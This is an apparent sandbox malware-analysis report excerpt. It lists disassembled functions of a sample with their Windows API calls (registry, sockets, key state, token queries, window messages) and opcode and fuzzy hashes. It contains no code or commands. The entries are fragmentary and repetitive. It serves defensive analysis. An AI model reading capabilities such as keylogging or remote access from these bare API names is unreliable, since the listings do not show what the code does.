                                    • API ID: MessageSend$ButtonCheckedLongWindow
                                    • String ID:
                                    • API String ID: 3188977179-0
                                    • Opcode ID: 49d5858d1bee66405297b0c2092d21012ed8f7dec4dc8a8645bdad5dd0b8cec5
                                    • Instruction ID: 9f00f8adb095b73eaa4c08d8faf6595cce003f42cc79f41be6c119aecaeffa51
                                    • Opcode Fuzzy Hash: 49d5858d1bee66405297b0c2092d21012ed8f7dec4dc8a8645bdad5dd0b8cec5
                                    • Instruction Fuzzy Hash: 01618D74A04248AFDF25CF58CC95FFA77FAAF89310F184069F959972A1C771A990CB10
                                    APIs
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001906EE
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0019077D
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0019079B
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 001907E1
                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 001907FB
                                      • Part of subcall function 0014E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0017A574,?,?,00000000,00000008), ref: 0014E675
                                      • Part of subcall function 0014E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0017A574,?,?,00000000,00000008), ref: 0014E699
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                    • String ID:
                                    • API String ID: 327935632-0
                                    • Opcode ID: 8605864f97594c2cad177a4debeb20a381eb3c8f153d54d0c86079ac66b6a455
                                    • Instruction ID: 4bde8210c5e918d85b558d950bc1a5bc13c0926857ebc02a63e1c4f2fe39d049
                                    • Opcode Fuzzy Hash: 8605864f97594c2cad177a4debeb20a381eb3c8f153d54d0c86079ac66b6a455
                                    • Instruction Fuzzy Hash: 8B512775A00209DFCF05EFA8D8819ADB7B5BF58320F058059EA55AB352DB30ED45CB80
                                    APIs
                                      • Part of subcall function 00193C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00192BB5,?,?), ref: 00193C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00192EEF
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00192F2E
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00192F75
                                    • RegCloseKey.ADVAPI32(?,?), ref: 00192FA1
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00192FAE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                    • String ID:
                                    • API String ID: 3740051246-0
                                    • Opcode ID: 162ae9d5fe9df928c0879c54366e707753e3d11d57f879bd1bad35db1e1911ee
                                    • Instruction ID: 1cd5347df822e326710328aa83a7bfc01b230e6faab8886c8ff13245fe3b41a0
                                    • Opcode Fuzzy Hash: 162ae9d5fe9df928c0879c54366e707753e3d11d57f879bd1bad35db1e1911ee
                                    • Instruction Fuzzy Hash: 2F515D72208204AFDB04EF64D881E6BB7F9FF98314F04896DF59597291DB30E905CB92
                                    APIs
                                    • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00188E7C
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188E89
                                    • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00188EAD
                                    • _strlen.LIBCMT ref: 00188EF7
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188F6A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_strlenselect
                                    • String ID:
                                    • API String ID: 2217125717-0
                                    • Opcode ID: e32583edf5086557cee6ff2819577502595b1030bfe09b6bb03247a3091eb87b
                                    • Instruction ID: 2eb7ad8168c7fef64fddaba78463a8f6a0cb4750506da992fcbbac87ace44d6e
                                    • Opcode Fuzzy Hash: e32583edf5086557cee6ff2819577502595b1030bfe09b6bb03247a3091eb87b
                                    • Instruction Fuzzy Hash: 4F416071500104AFCB18EFA4DD96EAEB7B9AF68314F504659F51AA7291EF30AF40CB60
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9a27b9f5857055fed8df637ab8a58f648b0bb9cc067f4756138d15c40768112e
                                    • Instruction ID: 496707a7c5a601dccf1e3d909ed8d79d25a082f0ab1ae7159c2ed17be32c4425
                                    • Opcode Fuzzy Hash: 9a27b9f5857055fed8df637ab8a58f648b0bb9cc067f4756138d15c40768112e
                                    • Instruction Fuzzy Hash: DA41B479900105AFCF14DBA8CC48FA9BFA9EB09320F150265F99AA72D1D770AD41DAD0
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001812B4
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001812DD
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0018131C
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00181341
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00181349
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                    • String ID:
                                    • API String ID: 1389676194-0
                                    • Opcode ID: 99b85538cec50f3c7f7a1428236493bd7d48b76519d71e300a50f968c1d51bfc
                                    • Instruction ID: f4cebef587c896602663cf5270963df59de4ef7b208727c2faf839d0211a18cc
                                    • Opcode Fuzzy Hash: 99b85538cec50f3c7f7a1428236493bd7d48b76519d71e300a50f968c1d51bfc
                                    • Instruction Fuzzy Hash: 3741F975A00105EFCB05EF64C9819AEBBF5FF18310B148099E90AAB361DB31EE41DF91
                                    APIs
                                    • GetCursorPos.USER32(000000FF), ref: 0014B64F
                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0014B66C
                                    • GetAsyncKeyState.USER32(00000001), ref: 0014B691
                                    • GetAsyncKeyState.USER32(00000002), ref: 0014B69F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: 2968427e27458e22342025d5b3aa55b85f73b591875868a37bd6d74425f99db0
                                    • Instruction ID: d5d16d11bed0a9804396a1decd9aa15688f7813436b331778d5fb93992986d36
                                    • Opcode Fuzzy Hash: 2968427e27458e22342025d5b3aa55b85f73b591875868a37bd6d74425f99db0
                                    • Instruction Fuzzy Hash: F0418275908115FFCF199F64C884AE9BBB4FB06324F114319F82A962A0DB30AD94DFA1
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 0016B369
                                    • PostMessageW.USER32(?,00000201,00000001), ref: 0016B413
                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0016B41B
                                    • PostMessageW.USER32(?,00000202,00000000), ref: 0016B429
                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0016B431
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: bd0ff474bcf74edd2e4688591e4bfde8ba7fff356270b0473d975d77340d223e
                                    • Instruction ID: 16e33a5f59945eca311248bd6356540440a022c9640db3820719258b64edee16
                                    • Opcode Fuzzy Hash: bd0ff474bcf74edd2e4688591e4bfde8ba7fff356270b0473d975d77340d223e
                                    • Instruction Fuzzy Hash: AF31D171A04219EBDF08CF68DD8DA9E3BB5FB04315F114229F821EB2D1D7B099A4CB90
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 0016DBD7
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0016DBF4
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0016DC2C
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0016DC52
                                    • _wcsstr.LIBCMT ref: 0016DC5C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                    • String ID:
                                    • API String ID: 3902887630-0
                                    • Opcode ID: a72e6c20f5fcbc1f4a1f3ef1d8f76dd05d3dba63493756bda9bd1aeaf8cc6a81
                                    • Instruction ID: 100bb4c06fa24fa1550ce292140095042e33c52e6b9cf2701557fca705bce085
                                    • Opcode Fuzzy Hash: a72e6c20f5fcbc1f4a1f3ef1d8f76dd05d3dba63493756bda9bd1aeaf8cc6a81
                                    • Instruction Fuzzy Hash: B821D472B04244BBEB199F39EC49E7B7BA8DF45760F11413DF809CA191EBA1DC51D2A0
                                    APIs
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0016BC90
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0016BCC2
                                    • __itow.LIBCMT ref: 0016BCDA
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0016BD00
                                    • __itow.LIBCMT ref: 0016BD11
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow
                                    • String ID:
                                    • API String ID: 3379773720-0
                                    • Opcode ID: b19e78800d18bf222a2f247846e7170b77266e202505e4683c85b7450a9dd47f
                                    • Instruction ID: fcfc6f407c925cd4ded696d6a492862fca712ac05ad678bfd72e45c8229d7be6
                                    • Opcode Fuzzy Hash: b19e78800d18bf222a2f247846e7170b77266e202505e4683c85b7450a9dd47f
                                    • Instruction Fuzzy Hash: EF21DB35600208BBDB15AEA59CC5FDE7B69AF6A750F010034F905EF181EB708D9587A1
                                    APIs
                                      • Part of subcall function 001350E6: _wcsncpy.LIBCMT ref: 001350FA
                                    • GetFileAttributesW.KERNEL32(?,?,?,?,001760C3), ref: 00176369
                                    • GetLastError.KERNEL32(?,?,?,001760C3), ref: 00176374
                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001760C3), ref: 00176388
                                    • _wcsrchr.LIBCMT ref: 001763AA
                                      • Part of subcall function 00176318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001760C3), ref: 001763E0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                    • String ID:
                                    APIs
                                      • Part of subcall function 0018A82C: inet_addr.WS2_32(00000000), ref: 0018A84E
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00188BD3
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188BE2
                                    • connect.WS2_32(00000000,?,00000010), ref: 00188BFE
                                    Similarity
                                    • API ID: ErrorLastconnectinet_addrsocket
                                    • String ID:
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 00188441
                                    • GetForegroundWindow.USER32 ref: 00188458
                                    • GetDC.USER32(00000000), ref: 00188494
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 001884A0
                                    • ReleaseDC.USER32(00000000,00000003), ref: 001884DB
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0014AFE3
                                    • SelectObject.GDI32(?,00000000), ref: 0014AFF2
                                    • BeginPath.GDI32(?), ref: 0014B009
                                    • SelectObject.GDI32(?,00000000), ref: 0014B033
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    APIs
                                    • __calloc_crt.LIBCMT ref: 001521A9
                                    • CreateThread.KERNEL32(?,?,001522DF,00000000,?,?), ref: 001521ED
                                    • GetLastError.KERNEL32 ref: 001521F7
                                    • _free.LIBCMT ref: 00152200
                                    • __dosmaperr.LIBCMT ref: 0015220B
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    Similarity
                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                    • String ID:
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0016ABD7
                                    • GetLastError.KERNEL32(?,0016A69F,?,?,?), ref: 0016ABE1
                                    • GetProcessHeap.KERNEL32(00000008,?,?,0016A69F,?,?,?), ref: 0016ABF0
                                    • RtlAllocateHeap.NTDLL(00000000,?,0016A69F), ref: 0016ABF7
                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0016AC0E
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                    • String ID:
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00177A74
                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00177A82
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00177A8A
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00177A94
                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00177AD0
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    APIs
                                    • CLSIDFromProgID.COMBASE ref: 00169ADC
                                    • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00169AF7
                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 00169B05
                                    • CoTaskMemFree.COMBASE(00000000), ref: 00169B15
                                    • CLSIDFromString.COMBASE(?,?), ref: 00169B21
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0016AA79
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0016AA83
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0016AA92
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0016AA99
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0016AAAF
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0016AADA
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0016AAE4
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0016AAF3
                                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0016AAFA
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0016AB10
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 0016EC94
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0016ECAB
                                    • MessageBeep.USER32(00000000), ref: 0016ECC3
                                    • KillTimer.USER32(?,0000040A), ref: 0016ECDF
                                    • EndDialog.USER32(?,00000001), ref: 0016ECF9
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    APIs
                                    • EndPath.GDI32(?), ref: 0014B0BA
                                    • StrokeAndFillPath.GDI32(?,?,001AE680,00000000,?,?,?), ref: 0014B0D6
                                    • SelectObject.GDI32(?,00000000), ref: 0014B0E9
                                    • DeleteObject.GDI32 ref: 0014B0FC
                                    • StrokePath.GDI32(?), ref: 0014B117
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 0017F2DA
                                    • CoCreateInstance.COMBASE(001BDA7C,00000000,00000001,001BD8EC,?), ref: 0017F2F2
                                    • CoUninitialize.COMBASE ref: 0017F555
                                    Strings
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize
                                    • String ID: .lnk
                                    APIs
                                      • Part of subcall function 0013660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001353B1,?,?,001361FF,?,00000000,00000001,00000000), ref: 0013662F
                                    • CoInitialize.OLE32(00000000), ref: 0017E85D
                                    • CoCreateInstance.COMBASE(001BDA7C,00000000,00000001,001BD8EC,?), ref: 0017E876
                                    • CoUninitialize.COMBASE ref: 0017E893
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                    • String ID: .lnk
                                    • API String ID: 2126378814-24824748
                                    • Opcode ID: f5e8863750487f97f373df5b19cfd7ad73d9ff1e2d81e328d5e6ab1538ac011d
                                    • Instruction ID: c581ab4f5915a002c2f94e7ce11e1ea51c6eb54b80e398d58ff849a1534951b7
                                    • Opcode Fuzzy Hash: f5e8863750487f97f373df5b19cfd7ad73d9ff1e2d81e328d5e6ab1538ac011d
                                    • Instruction Fuzzy Hash: 9AA143756043019FCB14EF24C88496EBBF5BF89324F148998F99A9B3A1CB31EC45CB91
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 001532ED
                                      • Part of subcall function 0015E0D0: __87except.LIBCMT ref: 0015E10B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__87except__start
                                    • String ID: pow
                                    • API String ID: 2905807303-2276729525
                                    • Opcode ID: 444137bb3d1e806fb191ab7913a63207b7dbffdd1f1471a62e6a64d9c7967ecb
                                    • Instruction ID: dd2b8b67cc939fbd4e5c1a5fa1dd4c0586a6dfd168e588831ad2afdd968aae5e
                                    • Opcode Fuzzy Hash: 444137bb3d1e806fb191ab7913a63207b7dbffdd1f1471a62e6a64d9c7967ecb
                                    • Instruction Fuzzy Hash: E2513631E08601D6CB1D6714C94137A2BD4AB50792F208D68FCF68F2A9EF748BDC9A46
                                    APIs
